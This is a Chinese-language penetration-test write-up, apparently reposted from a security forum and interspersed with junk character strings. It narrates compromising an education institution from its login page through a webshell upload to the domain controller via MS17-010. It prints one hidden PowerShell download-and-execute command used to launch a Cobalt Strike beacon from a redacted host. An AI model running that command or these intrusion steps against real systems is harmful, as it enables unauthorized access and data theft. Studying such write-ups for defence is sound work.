& ?( h; m: Y. s) W4 t) z3 } 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路! f: N+ Z4 \* P! G9 n& \+ k
: Q) s$ _; G$ N
' R0 ~' f0 \/ j) T 6 {& I& } H3 ~
) n, Z* F; u5 q) J, v: v' i |( ~8 s9 N8 l+ }3 d
正文: q0 M# H5 d5 @* l3 n9 R
. [) v9 ~! L8 L {6 H8 b" C
+ E3 |/ Z/ b8 O a . c; c; }% X' ?* E3 T0 F- ]. t1 f
& B8 W9 S& b$ t- ~- u" {& u# d1 l3 u q0 D
目标:www.xxxx.com(一家教育机构)
* j9 w6 o3 q9 b. }+ x1 K打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能! j O5 a. |/ i% d
8 J, A8 D% G+ l7 m ^) D9 g; T
& a% @1 @+ l- I+ F3 ^; Y- u1 h4 B8 P
6 B4 ?: m2 b, J- i4 F
3 B9 _) ], ]% T: ]. q9 w+ p* C
6 G% Q* ]" S0 c; Y$ D. u 进行了简单的信息搜集
3 r) i9 p/ D7 h$ N- j $ p0 Z$ j8 z# J7 |9 d0 ~7 a4 @. F# b
$ H1 P- M) H0 u3 e3 W
8 |+ s, T; Y( X2 v4 A
: _9 B1 F$ w4 u# @. T 子域名搜集% K' Q `& V+ ~; @$ X
L" t B4 v# P% @9 X ?1 F7 A
3 {" g; r+ i9 V: T1 ?$ y
. a: Y$ M3 ~3 w. S# m- S& b2 j " E& K6 p g9 w/ K' U; ^% {
* S7 a+ D+ u9 \8 {6 A fofa找资产
) X/ R6 n; a* T/ Z3 C' g& A
4 T2 K1 Y9 p8 K, Q m* y G+ R
" _/ Z+ S% Q$ y5 y* @ o4 K( y4 |
2 M! c6 w+ _& C. d; [
) m" r1 n# ^( c+ V: `6 v0 t9 a 1 d( f8 p0 w5 u
3 S/ i7 H9 l6 H) Y1 v1 B; u ?& E2 Z
一共七个资产。去重之后只有两个。
, ?9 ~: w: F( U( P J, p4 X S5 x) F0 s% W3 C! K! B7 K5 `
: F# ?. I; ]5 h$ p( P
4 O) Y) b% |; K8 C" J( Y9 }" H$ a- L, h
目录探测6 u; }1 n, h; r- D% C4 |$ ~
! f( l0 r& a( ]! f9 z
0 I5 N. ]; H# M* K+ F C: R7 M
; N2 }0 l6 k8 F: j. I
" {2 R" N0 a' p* Y, J
; G# A- X8 F/ [( w( d6 P. Q# F7 Z
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( Y: t: Z7 C; ^% u j
9 G# [# a% ^7 k' I6 r) P0 K _3 ]. R9 i& D' t7 a
( D- M( n4 t. V6 i6 z, q4 e
7 T3 R- E a! D* ? 我又尝试了通过修改返回包来绕过登录界面
! }& p9 ?! D! ]- x
|* g9 `( I" s( @1 {2 t/ `; Z5 ~3 Z/ v6 c, {
6 ]# R9 ~% k" R9 J. o+ m
4 d4 K5 K+ c; T: M/ R3 z# R0 b- N
, Y: @+ r* ^) W: l 还是不行,尝试注入无果
8 C% @) B( U& n8 [, \/ o; A , y" C; X1 ~' Y T1 Y( W& R
7 p5 \: r2 I& A# O( L6 f$ W& U5 z; t
1 d) o; d4 C& ?8 m% j \2 {; V9 N 4 k9 ^) K: J8 ^ T u7 F' M
. a/ N4 e; ?) c, n! r 不过我目录探测出了一处Spring信息泄露
( X. l/ Y6 }7 w
; d& }% P# a6 _1 G" S6 f' Q! S2 V
' C* n$ S4 P p; q3 }" f
3 {8 [4 \8 i; ?# f
1 e3 x3 o. z0 \' F7 }. l
' r! R1 s! J/ Q% j' F! v& k4 S
: {6 Q% L. ?% Q `' W: q
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录" A& q5 ]* P: d, D d6 q$ x, B B s
$ g! W+ N% L9 T# b9 u
% H6 g2 F [& F3 o% ]! t8 Z
" r0 @) C; G" u8 A
$ Z/ E9 c! m, l K4 ~# T, D" @5 g y1 o
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
( o) ]1 k: O- t5 {5 \$ W ! s! q$ [6 C* F2 d0 A
0 t: r; j8 v) U. G+ l% p- U / O. x3 p" {9 k3 }, G
6 D9 W) d! H$ j( S' [! P0 h) h9 K7 l9 S/ X9 H, \3 a3 d- h
获取有些师傅到这一步就手机抓包电脑测了。6 p' [* i) _/ X% ]- x% q
+ _! P/ C( y$ P' _& Z4 O" |& h: X r, H7 g5 F" o
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
) e- r$ q8 l7 r& s+ ?# R 4 a, n' U9 i+ Y
# B4 X( P9 s3 u. o( H8 T' @+ s
其中在一个公众号发现了小程序,可以进行注册。
2 |3 B, K, Z: O* b8 X8 r9 r+ e6 Y + F/ H/ ~7 M" [$ {( \
$ \. T4 D* T1 Y& _6 h: h# s3 c; [
看到了头像上传,尝试上传获取WebShell0 U' n2 m ? M2 _# o+ s
4 z) d" r7 L' G' s- ]
! }$ q6 b& T0 y* `- u& L) ^8 C
3 l0 \4 l" d r 6 c+ U' z; ~, P( p- Y& K
7 ~8 Q: K9 t" D& [" g" f' n* I
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
- I/ P" y; v- \- Z" f + _8 c& Q, Z# n8 J' m
# H/ q$ O% `8 b4 U3 i # j, Z) {7 W& q+ k9 Z
* y C `+ a$ C; y" Q. M; [. S5 g7 f& X, a& y" ?/ `
然后上了大马
" ~7 T) l+ n: D4 E e 4 N8 ^0 J8 Y' X2 k5 P) x
- Y2 Y: q8 L1 q; ^
" m6 J' y6 Z6 L: O. V
; L% C( V0 S1 ^# R8 S6 P- Q6 u6 n, J1 u. j% Y* L
) Q$ d8 f' K4 _+ _
4 X: E# D! b! e% D2 S
; p4 K* r2 j& x2 d( f# X% { 通过翻找文件发现数据库账号密码
9 X& v/ D: v$ q* }. ~
# H: @( I4 O7 K3 R
" [+ F5 o- O1 G1 z A. Y! }
9 p {/ ^' M" k+ `, T: l
E1 j" }4 w- ~" ]4 Q; Z, `1 N, `
--内网渗透
5 u9 ~! r( j- y1 I4 B - \6 q/ R+ M v# }% }
% z" K$ [3 R6 P7 i 直接通过powershell执行 cs上线3 F4 N# R0 w+ }) ?' s. ] }0 q
8 M9 \0 J' V' U+ f9 Y+ }5 a; _0 b+ n2 Y/ E3 U5 P" O
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
2 K. ^+ w/ j. j7 ~
( q" l5 \" T; g+ A7 u
6 X: A# U+ \" C a) o# P8 `
$ W- ~; t9 T5 J6 }
. z) H% a( u5 s, h8 L! J- |; I, I
+ `+ t; ]4 R7 Z+ O 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破2 r% x; n" j) G$ p
4 P1 \6 m7 A. S/ y
* K# X2 D) w: R& P+ F- E8 t8 K% T
9 r: p: l& P" v9 p) i( e
3 q# Y! U% I+ A2 J0 I& D! w0 \5 q9 P: K9 g: O: v/ H8 Y" Y$ G
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 6 u: r5 U# V2 b2 Y, Q) n A( L
# F7 t& F, V4 ]' }8 [" ~) S* f
6 l9 ]$ L1 d3 S& [/ R9 o5 l( H" g1 G5 K6 c
0 ~! j4 s! E' I$ A" U
- o/ v; v, L9 O5 {
3 r; f' O3 m: e' e& `' p . l) e6 ~. y D7 T' t/ R
- q2 J, t- `- B0 D3 ^ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ o5 Y& ~. v* v) \ * W* i" B9 G+ D) ~7 q
+ S% z9 D! M9 e' @6 \/ t
$ c0 }- Q' A( d
. u5 B% f, O, Y) A# Z3 u
0 T) z* y2 |7 U3 e, o" K; Q6 V( c$ i- Q
: A5 ^4 _" A( W- E% A
1 s I" d6 n, o/ a) R- J1 i, I8 }# P 8 Y9 |. e: J, W- K* a5 |: k& s
( Y+ c) B1 Q# G! c, P5 t8 E$ z0 c z, Z+ f
% l& b' r% r5 v/ t- ?
! P! l- v1 D. f" Y' [
2 n9 O7 X8 \/ A( h& N: n* p9 `" c
3 {2 D7 M+ K0 [" X4 {1 Q8 u
. p( t6 i- p F 小结/ W$ e8 _+ h0 }
E0 L/ l M/ Y6 K! O* }! H3 q: A
7 Y6 r9 d, n6 H S' ]! n
% `) r! y3 Z2 `& d6 U7 Q
T9 `) @: P1 L2 k# r' s4 m' F' D" E5 q& |0 J
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!) y4 c p& ?! s3 w/ l
$ B) o; o8 S8 B- ~2 g( P# G8 L
: g+ m( |6 R+ b! v: K& n
, t8 | h2 s; k( J. j; Q7 m! R4 s1 X
# S$ e/ e+ ~: [1 N7 \) J8 S. G6 z: l: }1 z
- # I! c3 J8 G7 Y: D
& U0 B/ S; V" I! D6 t' s
k4 y1 j$ h# u( j" o
- ' x d c4 R9 R5 P g9 s7 s) i4 R1 g. |
" R/ L9 A8 R. d: k# b+ p- o) Z; z( a
9 R% m7 V5 B$ ^
) ?' O# ]8 U9 q5 @+ ]8 N( O8 U3 \' z3 k ?* ]! A! }
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
$ _6 T2 P+ X+ P, U7 ]. k9 w
6 T( }1 d: Z1 F! i% {+ p: v9 T( A$ d
2 q4 n8 d9 ]+ K! }4 `: Z9 ` 1 A% [: d; H* e: O2 P! w# F
|